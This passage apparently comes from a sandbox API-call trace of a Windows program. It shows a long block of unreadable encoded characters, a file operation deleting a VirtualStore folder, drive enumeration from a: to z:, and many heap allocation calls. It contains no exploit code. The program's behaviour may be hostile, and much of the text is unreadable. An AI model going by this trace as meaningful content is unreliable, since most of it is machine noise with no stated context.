끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0205.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0205.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.489] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0205.489] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0205.489] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0205.489] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0205.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0205.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0205.491] CharLowerBuffW (in: lpsz="FIXED", cchLength=0x5 | out: lpsz="fixed") returned 0x5 [0205.492] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0205.519] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0205.520] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0205.523] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0205.523] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0205.523] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0205.523] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0205.523] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0205.524] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0205.525] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0205.526] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0205.526] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0205.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0205.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0205.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0205.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaeb00 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0205.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6108 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6140 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61e8 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73808 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73220 | out: hHeap=0x2af0000) returned 1 [0205.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731b0 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0205.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 